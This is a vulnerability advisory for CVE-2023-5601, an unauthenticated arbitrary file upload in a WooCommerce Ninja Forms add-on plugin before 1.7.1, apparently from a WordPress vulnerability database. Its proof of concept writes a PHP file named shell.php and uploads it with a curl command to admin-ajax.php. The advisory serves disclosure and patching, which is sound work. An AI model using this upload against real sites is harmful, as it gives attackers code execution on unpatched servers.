WordPress Plugin Vulnerabilities

WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload

Description

The plugin does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.

Proof of Concept

Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF's latest version on the 3.4 branch) installed, then follow those instructions:

1 - Run the following shell command to create a PHP file who's mime type will be detected as text/plain:

echo 'Hello world! <?php phpinfo();' > shell.php

2 - Run the following curl command to upload the malicious PHP file onto the site:

curl 'https://example.com/wp-admin/admin-ajax.php' -F 'action=wc_nf_submit' -F 'f[][email protected]'

3 - Visit the uploaded shell at 'https://example.com/wp-content/uploads/YYYY/MM/shell.php

Affects Plugins

Plugin icon
woocommerce-ninjaforms-product-addons
Fixed in 1.7.1

References

CVE
CVE-2023-5601

Miscellaneous

Original Researcher
Alexander Concha
Verified
Yes
WPVDB ID
0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc

Timeline

Publicly Published
2023-10-16 (about 1 months ago)
Added
2023-10-16 (about 1 months ago)
Last Updated
2023-10-16 (about 1 months ago)

Other

Published
Title
Published
2014-08-01
Title
Resume Submissions Job Posting <= 2.5.1 - Unrestricted File Upload
Published
2014-03-05
Title
Barclaycart - Unauthenticated Shell Upload
Published
2012-06-12
Title
Contus Video Gallery 1.3 - Arbitrary File Upload
Published
2023-06-16
Title
Unlimited Elements For Elementor < 1.5.67 - Contributor+ Arbitrary File Upload
Published
2021-04-30
Title
Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE